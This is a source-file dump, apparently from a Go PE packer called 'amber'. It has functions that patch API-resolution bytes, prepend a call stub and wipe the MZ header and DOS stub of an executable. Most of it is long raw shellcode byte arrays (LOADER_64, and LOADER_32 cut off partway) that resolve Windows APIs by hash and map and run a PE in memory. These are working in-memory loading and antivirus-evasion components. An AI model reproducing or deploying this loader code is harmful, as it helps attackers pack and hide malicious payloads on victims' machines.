158 | if pe.SyscallLoader {
159 | return nil, errors.New("cannot use IAT resolver with syscall loader")
160 | }
161 | switch pe.Architecture {
162 | case 32:
163 | payload = bytes.ReplaceAll(payload, CRC_API_32, IAT_API_32)
164 | case 64:
165 | payload = bytes.ReplaceAll(payload, CRC_API_64, IAT_API_64)
166 | }
167 | }
168 |
169 | return payload, nil
170 | }
171 |
172 | // AddCallOver function adds a call instruction at the beginning of the given payload
173 | // address of the payload will be pushed to the stack and execution will continue after the end of payload
174 | func (pe *PE) AddCallOver(payload []byte) ([]byte, error) {
175 | // // Perform a short call over the payload
176 | size := uint32(len(payload))
177 | buf := new(bytes.Buffer)
178 | err := binary.Write(buf, binary.LittleEndian, size)
179 | if err != nil {
180 | return nil, err
181 | }
182 | return append(append([]byte{0xe8}, buf.Bytes()...), payload...), nil
183 | }
184 |
185 | func (pe *PE) ScrapePeHeaders() ([]byte, error) {
186 | rawFile, err := pe.file.Bytes()
187 | if err != nil {
188 | return nil, err
189 | }
190 |
191 | // Scrape MZ magic bytes...
192 | if rawFile[0] == 'M' &&
193 | rawFile[1] == 'Z' {
194 | rawFile[0] = 0x00
195 | rawFile[1] = 0x00
196 | } else {
197 | return nil, ErrInvalidPeHeaders
198 | }
199 |
200 | // Scrape the DOS stub message...
201 | if bytes.Contains(rawFile, []byte(PE_DOS_STUB)) {
202 | return nil, ErrInvalidPeHeaders
203 | }
204 |
205 | return bytes.Replace(rawFile, []byte(PE_DOS_STUB), make([]byte, len(PE_DOS_STUB)), 1), nil
206 | }
207 |
--------------------------------------------------------------------------------
/pkg/static.go:
--------------------------------------------------------------------------------
1 | package amber
2 |
3 | var LOADER_64 = []byte{
4 | 0x5e, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0xf1, 0xe8, 0x97, 0x00, 0x00,
5 | 0x00, 0x48, 0x89, 0xc7, 0x48, 0x89, 0xf9, 0xe8, 0xdf, 0x02, 0x00, 0x00,
6 | 0x48, 0x89, 0xf9, 0xe8, 0x46, 0x02, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8,
7 | 0xf2, 0x05, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9b, 0x07, 0x00, 0x00,
8 | 0x48, 0x31, 0xc0, 0x8b, 0x47, 0x3c, 0x8b, 0x44, 0x07, 0x28, 0x48, 0x01,
9 | 0xf8, 0xe9, 0x9d, 0x08, 0x00, 0x00, 0x56, 0x57, 0x48, 0x89, 0xcf, 0x48,
10 | 0x89, 0xd6, 0x4c, 0x89, 0xc1, 0xf3, 0xa4, 0x5f, 0x5e, 0xc3, 0x66, 0x85,
11 | 0xd2, 0x74, 0x24, 0x49, 0x89, 0xc8, 0x0f, 0xb7, 0xd2, 0x8d, 0x42, 0xff,
12 | 0x48, 0x8d, 0x54, 0x01, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x41,
13 | 0x0f, 0x38, 0xf0, 0x00, 0x49, 0x83, 0xc0, 0x01, 0x49, 0x39, 0xd0, 0x75,
14 | 0xf1, 0xeb, 0x21, 0x0f, 0xb6, 0x11, 0x84, 0xd2, 0x74, 0x1b, 0x48, 0x83,
15 | 0xc1, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xc2,
16 | 0x48, 0x83, 0xc1, 0x01, 0x0f, 0xb6, 0x51, 0xff, 0x84, 0xd2, 0x75, 0xef,
17 | 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf8, 0x55, 0x57, 0x56, 0x53,
18 | 0x48, 0x83, 0xec, 0x48, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
19 | 0x01, 0xcf, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00,
20 | 0x00, 0x0f, 0x85, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38,
21 | 0x00, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x50, 0x48, 0x89, 0x44, 0x24, 0x30,
22 | 0x48, 0x8d, 0x54, 0x24, 0x38, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00,
23 | 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x10, 0x00, 0x4c, 0x8d, 0x4c,
24 | 0x24, 0x30, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff,
25 | 0xff, 0xff, 0xff, 0x41, 0xba, 0x55, 0x7c, 0xce, 0x99, 0xe8, 0x1b, 0x07,
26 | 0x00, 0x00, 0xff, 0xd0, 0x89, 0xc2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85,
27 | 0xd2, 0x78, 0x51, 0x44, 0x8b, 0x47, 0x54, 0x48, 0x89, 0xea, 0x48, 0x8b,
28 | 0x4c, 0x24, 0x38, 0xe8, 0x1a, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x47, 0x14,
29 | 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74, 0x2b,
30 | 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x0c, 0x48, 0x03, 0x4c, 0x24,
31 | 0x38, 0x8b, 0x53, 0x14, 0x48, 0x01, 0xea, 0x44, 0x8b, 0x43, 0x10, 0xe8,
32 | 0xee, 0xfe, 0xff, 0xff, 0x83, 0xc6, 0x01, 0x48, 0x83, 0xc3, 0x28, 0x0f,
33 | 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x7f, 0xda, 0x48, 0x8b, 0x44, 0x24, 0x38,
34 | 0x48, 0x83, 0xc4, 0x48, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x57, 0x48, 0x81,
35 | 0xec, 0x50, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0x84, 0x24,
36 | 0x48, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x84, 0x24, 0x34,
37 | 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x7c, 0x24, 0x20,
38 | 0xb9, 0x41, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf3, 0x48,
39 | 0xab, 0x41, 0x80, 0x38, 0x00, 0x0f, 0x84, 0x94, 0x00, 0x00, 0x00, 0xba,
40 | 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0x83, 0xc2, 0x01, 0x41,
41 | 0x80, 0x7c, 0x10, 0xff, 0x00, 0x75, 0xf1, 0x8d, 0x14, 0x00, 0x66, 0x89,
42 | 0x94, 0x24, 0x30, 0x02, 0x00, 0x00, 0x83, 0xc2, 0x02, 0x66, 0x89, 0x94,
43 | 0x24, 0x32, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x89,
44 | 0x94, 0x24, 0x38, 0x02, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x78, 0x15, 0x48,
45 | 0x98, 0x66, 0x41, 0x0f, 0xbe, 0x14, 0x00, 0x66, 0x89, 0x54, 0x44, 0x20,
46 | 0x48, 0x83, 0xe8, 0x01, 0x85, 0xc0, 0x79, 0xed, 0x4c, 0x8d, 0x8c, 0x24,
47 | 0x48, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00,
48 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xba,
49 | 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x00, 0x06, 0x00, 0x00, 0xff, 0xd0, 0x85,
50 | 0xc0, 0x78, 0x11, 0x48, 0x8b, 0x84, 0x24, 0x48, 0x02, 0x00, 0x00, 0x48,
51 | 0x81, 0xc4, 0x50, 0x02, 0x00, 0x00, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00,
52 | 0x00, 0xeb, 0xf0, 0x66, 0xc7, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0x00,
53 | 0x00, 0x66, 0xc7, 0x84, 0x24, 0x32, 0x02, 0x00, 0x00, 0x02, 0x00, 0x48,
54 | 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89, 0x84, 0x24, 0x38, 0x02, 0x00, 0x00,
55 | 0xeb, 0x9a, 0x49, 0x89, 0xc9, 0x48, 0x63, 0x51, 0x3c, 0x48, 0x01, 0xca,
56 | 0x8b, 0x82, 0xb0, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x85,
57 | 0xc0, 0x74, 0x75, 0x89, 0xc0, 0x49, 0x8d, 0x0c, 0x01, 0x4d, 0x89, 0xca,
58 | 0x4c, 0x2b, 0x52, 0x30, 0x83, 0x39, 0x00, 0x75, 0x4a, 0xb9, 0x01, 0x00,
59 | 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x11, 0x44, 0x0f, 0xb7, 0x00, 0x41, 0x81,
60 | 0xe0, 0xff, 0x0f, 0x00, 0x00, 0x4c, 0x01, 0xc2, 0x4d, 0x01, 0x14, 0x11,
61 | 0x48, 0x83, 0xc0, 0x02, 0x8b, 0x51, 0x04, 0x48, 0x01, 0xca, 0x48, 0x39,
62 | 0xd0, 0x74, 0x18, 0x0f, 0xb6, 0x50, 0x01, 0x41, 0x89, 0xd0, 0x41, 0x83,
63 | 0xe0, 0xf0, 0x41, 0x80, 0xf8, 0xa0, 0x74, 0xcc, 0x80, 0xfa, 0x0f, 0x76,
64 | 0xdb, 0xeb, 0xd9, 0x48, 0x89, 0xc1, 0x83, 0x39, 0x00, 0x74, 0x14, 0x48,
65 | 0x8d, 0x41, 0x08, 0x8b, 0x51, 0x04, 0x48, 0x01, 0xca, 0x48, 0x39, 0xd0,
66 | 0x75, 0xd1, 0x48, 0x89, 0xd1, 0xeb, 0xe7, 0xb9, 0x01, 0x00, 0x00, 0x00,
67 | 0x89, 0xc8, 0xc3, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec,
68 | 0x20, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0x90,
69 | 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
70 | 0xb0, 0x00, 0x00, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x24, 0x01, 0x41, 0x8b,
71 | 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x6a, 0xba, 0x01, 0x00, 0x00, 0x00,
72 | 0xe9, 0x97, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
73 | 0xf9, 0xe8, 0x97, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x03, 0x48,
74 | 0x89, 0x06, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x83, 0xc6, 0x08, 0x4c, 0x8b,
75 | 0x03, 0x4d, 0x85, 0xc0, 0x74, 0x2e, 0x4d, 0x85, 0xc0, 0x78, 0xd6, 0x4a,
76 | 0x8d, 0x4c, 0x05, 0x02, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe4, 0xfc,
77 | 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89,
78 | 0xf9, 0xe8, 0x5b, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0xc7, 0x48,
79 | 0x89, 0x06, 0xeb, 0xc2, 0x49, 0x83, 0xc4, 0x14, 0x41, 0x8b, 0x4c, 0x24,
80 | 0x0c, 0x85, 0xc9, 0x74, 0x2b, 0x89, 0xc9, 0x48, 0x01, 0xe9, 0xe8, 0xd2,
81 | 0xfd, 0xff, 0xff, 0x48, 0x89, 0xc7, 0x48, 0x85, 0xc0, 0x74, 0x20, 0x41,
82 | 0x8b, 0x1c, 0x24, 0x48, 0x01, 0xeb, 0x41, 0x8b, 0x74, 0x24, 0x10, 0x48,
83 | 0x01, 0xee, 0x4c, 0x8b, 0x03, 0x4d, 0x85, 0xc0, 0x75, 0x9c, 0xeb, 0xc8,
84 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xba, 0x00, 0x00, 0x00, 0x00,
85 | 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c,
86 | 0xc3, 0x41, 0x57, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x55, 0x57, 0x56,
87 | 0x53, 0x48, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xcb, 0x41,
88 | 0x89, 0xd5, 0x44, 0x89, 0xc5, 0x48, 0x63, 0x41, 0x3c, 0x48, 0x01, 0xc8,
89 | 0x8b, 0xb0, 0x88, 0x00, 0x00, 0x00, 0x48, 0x01, 0xce, 0x8b, 0x80, 0x8c,
90 | 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x2c, 0x44, 0x8b, 0x66, 0x20, 0x44,
91 | 0x8b, 0x76, 0x1c, 0x44, 0x8b, 0x7e, 0x24, 0x8b, 0x46, 0x18, 0x85, 0xc0,
92 | 0x0f, 0x84, 0x97, 0x01, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x44, 0x24,
93 | 0x20, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x49, 0x01, 0xcc, 0x41, 0x8b, 0x0c,
94 | 0xbc, 0x48, 0x01, 0xd9, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x0c, 0xfc,
95 | 0xff, 0xff, 0x39, 0xfd, 0x74, 0x1a, 0x44, 0x39, 0xe8, 0x74, 0x15, 0x48,
96 | 0x83, 0xc7, 0x01, 0x48, 0x39, 0x7c, 0x24, 0x20, 0x75, 0xdb, 0xb8, 0x00,
97 | 0x00, 0x00, 0x00, 0xe9, 0x2d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x7b,
98 | 0x42, 0x0f, 0xb7, 0x04, 0x38, 0x48, 0x8d, 0x04, 0x83, 0x42, 0x8b, 0x04,
99 | 0x30, 0x48, 0x01, 0xc3, 0x48, 0x39, 0xf3, 0x0f, 0x82, 0x0d, 0x01, 0x00,
100 | 0x00, 0x8b, 0x44, 0x24, 0x2c, 0x48, 0x01, 0xc6, 0x48, 0x39, 0xf3, 0x0f,
101 | 0x83, 0xfd, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00,
102 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48,
103 | 0x8d, 0x7c, 0x24, 0x40, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x1e, 0x00,
104 | 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00, 0x00, 0x00, 0x00, 0x48,
105 | 0xc7, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
106 | 0xc7, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
107 | 0x8d, 0xbc, 0x24, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00,
108 | 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3b, 0x2e,
109 | 0x0f, 0x84, 0xb3, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x49,
110 | 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80, 0x7c, 0x03, 0xff, 0x2e, 0x75,
111 | 0xf2, 0x44, 0x89, 0xc6, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0x48, 0x89, 0xda,
112 | 0xe8, 0x2d, 0xfb, 0xff, 0xff, 0x8d, 0x4e, 0x01, 0x48, 0x63, 0xc9, 0x48,
113 | 0x01, 0xd9, 0x80, 0x39, 0x00, 0x0f, 0x84, 0x8e, 0x00, 0x00, 0x00, 0xb8,
114 | 0x01, 0x00, 0x00, 0x00, 0x48, 0x63, 0xd6, 0x48, 0x01, 0xda, 0x49, 0x89,
115 | 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80, 0x3c, 0x02, 0x00, 0x75, 0xf3, 0x48,
116 | 0x8d, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x48, 0x89, 0xca, 0x48, 0x89,
117 | 0xc1, 0xe8, 0xf0, 0xfa, 0xff, 0xff, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xe8,
118 | 0x15, 0xfc, 0xff, 0xff, 0x48, 0x89, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
119 | 0x48, 0x85, 0xdb, 0x74, 0x28, 0x48, 0x8d, 0x8c, 0x24, 0x40, 0x01, 0x00,
120 | 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x89,
121 | 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xd9, 0xe8, 0x4e,
122 | 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc3, 0x48, 0x89, 0xd8, 0x48, 0x81, 0xc4,
123 | 0x58, 0x02, 0x00, 0x00, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d,
124 | 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
125 | 0x00, 0x00, 0x00, 0x00, 0xe9, 0x53, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00,
126 | 0x00, 0x00, 0x00, 0xeb, 0x82, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xcd,
127 | 0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x20, 0x89, 0xce, 0x65, 0x48, 0x8b,
128 | 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d,
129 | 0x78, 0x20, 0x48, 0x8b, 0x58, 0x20, 0x48, 0x39, 0xdf, 0x74, 0x2c, 0x0f,
130 | 0xb7, 0x53, 0x48, 0x48, 0x8b, 0x4b, 0x50, 0xe8, 0x5e, 0xfa, 0xff, 0xff,
131 | 0x39, 0xf0, 0x74, 0x0f, 0x48, 0x8b, 0x1b, 0x48, 0x39, 0xdf, 0x75, 0xe7,
132 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x04, 0x48, 0x8b, 0x43, 0x20, 0x48,
133 | 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
134 | 0xeb, 0xf1, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53,
135 | 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
136 | 0x01, 0xcf, 0x0f, 0xb7, 0x47, 0x14, 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x48,
137 | 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x66, 0x83, 0x7f, 0x06,
138 | 0x00, 0x74, 0x69, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x41, 0xbc, 0x00, 0x00,
139 | 0x00, 0x00, 0x4c, 0x8d, 0x74, 0x24, 0x40, 0x4c, 0x8d, 0x6c, 0x24, 0x48,
140 | 0xe9, 0x1f, 0x01, 0x00, 0x00, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x25, 0x00,
141 | 0x00, 0x00, 0x60, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x3d, 0x00, 0x00,
142 | 0x00, 0x60, 0x41, 0xb9, 0x20, 0x00, 0x00, 0x00, 0xb8, 0x80, 0x00, 0x00,
143 | 0x00, 0x44, 0x0f, 0x45, 0xc8, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x41, 0xb9,
144 | 0x20, 0x00, 0x00, 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
145 | 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
146 | 0x50, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0xc3,
147 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xea, 0xb9, 0x01, 0x00, 0x00, 0x00,
148 | 0x45, 0x89, 0xe0, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x44,
149 | 0x89, 0xe1, 0xa9, 0x00, 0x00, 0x00, 0x20, 0x74, 0x32, 0xb9, 0x00, 0x00,
150 | 0x00, 0x00, 0x85, 0xc0, 0x78, 0x8c, 0x89, 0xc1, 0xc1, 0xe9, 0x1f, 0x41,
151 | 0x89, 0xc8, 0x44, 0x89, 0xe1, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb,
152 | 0x19, 0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0x69, 0xff, 0xff, 0xff,
153 | 0xb9, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x45,
154 | 0x89, 0xe0, 0x25, 0x00, 0x00, 0x00, 0x60, 0x3d, 0x00, 0x00, 0x00, 0x60,
155 | 0x0f, 0x84, 0x74, 0xff, 0xff, 0xff, 0x84, 0xc9, 0x74, 0x0c, 0x45, 0x84,
156 | 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x0f, 0x45, 0xc8, 0x8b, 0x42,
157 | 0x0c, 0x48, 0x01, 0xe8, 0x48, 0x89, 0x44, 0x24, 0x48, 0x8b, 0x42, 0x10,
158 | 0x48, 0x89, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x3c, 0x00, 0x00, 0x00,
159 | 0x00, 0x48, 0x8d, 0x44, 0x24, 0x3c, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4d,
160 | 0x89, 0xf0, 0x4c, 0x89, 0xea, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff,
161 | 0x41, 0xba, 0x41, 0x4d, 0xde, 0x6e, 0xe8, 0xbe, 0x00, 0x00, 0x00, 0xff,
162 | 0xd0, 0x85, 0xc0, 0x0f, 0x88, 0x28, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01,
163 | 0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x0f, 0x8e,
164 | 0x1c, 0xff, 0xff, 0xff, 0x48, 0x89, 0xda, 0x8b, 0x43, 0x24, 0x85, 0xc0,
165 | 0x74, 0xe3, 0x41, 0x89, 0xc1, 0x41, 0xc1, 0xf9, 0x1f, 0x41, 0x83, 0xe1,
166 | 0xc8, 0x41, 0x83, 0xc1, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84,
167 | 0x23, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x41, 0xff, 0xff, 0xff,
168 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0x00, 0xff, 0xff, 0xff, 0xb9,
169 | 0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0xe9, 0x3c,
170 | 0xff, 0xff, 0xff, 0x56, 0x53, 0x48, 0x83, 0xec, 0x28, 0x48, 0x89, 0xce,
171 | 0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0xd0, 0x00, 0x00, 0x00, 0xba,
172 | 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x11, 0x89, 0xc0, 0x48, 0x8b,
173 | 0x5c, 0x01, 0x18, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x75,
174 | 0x1d, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0xc3, 0x41, 0xb8,
175 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf1,
176 | 0xff, 0xd0, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x8b, 0x03, 0x48, 0x85, 0xc0,
177 | 0x75, 0xe4, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd4, 0x41, 0x51, 0x41,
178 | 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60,
179 | 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50,
180 | 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac,
181 | 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
182 | 0xe2, 0xee, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c,
183 | 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b,
184 | 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01,
185 | 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0,
186 | 0xe3, 0x49, 0x4c, 0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b,
187 | 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f,
188 | 0x38, 0xf0, 0xc8, 0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc,
189 | 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c,
190 | 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88,
191 | 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58,
192 | 0x41, 0x59, 0xc3, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x5d,
193 | 0xff, 0xff, 0xff, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x48, 0x29, 0xf1,
194 | 0x48, 0x83, 0xc1, 0x11, 0x48, 0x89, 0xf7, 0x48, 0x83, 0xef, 0x05, 0xf3,
195 | 0xaa, 0xfc, 0x48, 0x89, 0xec, 0x5d, 0xff, 0xe0,
196 | }
197 |
198 | var LOADER_32 = []byte{
199 | 0x5e, 0x55, 0x89, 0xe5, 0x56, 0xe8, 0x8d, 0x00, 0x00, 0x00, 0x5e, 0x50,
200 | 0xe8, 0x52, 0x02, 0x00, 0x00, 0xe8, 0xd0, 0x02, 0x00, 0x00, 0xe8, 0xac,
201 | 0x05, 0x00, 0x00, 0xe8, 0x1f, 0x07, 0x00, 0x00, 0x5f, 0x8b, 0x47, 0x3c,
202 | 0x8b, 0x44, 0x07, 0x28, 0x01, 0xf8, 0xe9, 0xe3, 0x07, 0x00, 0x00, 0x55,
203 | 0x89, 0xe5, 0x56, 0x57, 0x51, 0x8b, 0x7d, 0x08, 0x8b, 0x75, 0x0c, 0x8b,
204 | 0x4d, 0x10, 0xf3, 0xa4, 0x59, 0x5f, 0x5e, 0x89, 0xec, 0x5d, 0xc3, 0x8b,
205 | 0x44, 0x24, 0x04, 0x8b, 0x54, 0x24, 0x08, 0x66, 0x85, 0xd2, 0x74, 0x1a,
206 | 0x89, 0xc1, 0x0f, 0xb7, 0xd2, 0x01, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00,
207 | 0xf2, 0x0f, 0x38, 0xf0, 0x11, 0x83, 0xc1, 0x01, 0x39, 0xc1, 0x75, 0xf4,
208 | 0xeb, 0x1f, 0x0f, 0xb6, 0x08, 0x84, 0xc9, 0x74, 0x1b, 0x83, 0xc0, 0x01,
209 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xd1, 0x83, 0xc0,
210 | 0x01, 0x0f, 0xb6, 0x48, 0xff, 0x84, 0xc9, 0x75, 0xf0, 0x89, 0xd0, 0xc3,
211 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf6, 0x55, 0x57, 0x56, 0x53, 0x83,
212 | 0xec, 0x3c, 0x8b, 0x6c, 0x24, 0x50, 0x89, 0xef, 0x03, 0x7d, 0x3c, 0xb8,
213 | 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00, 0x00, 0x0f, 0x85,
214 | 0xb7, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x2c, 0x00, 0x00, 0x00, 0x00,
215 | 0x8b, 0x47, 0x50, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x14, 0x04,
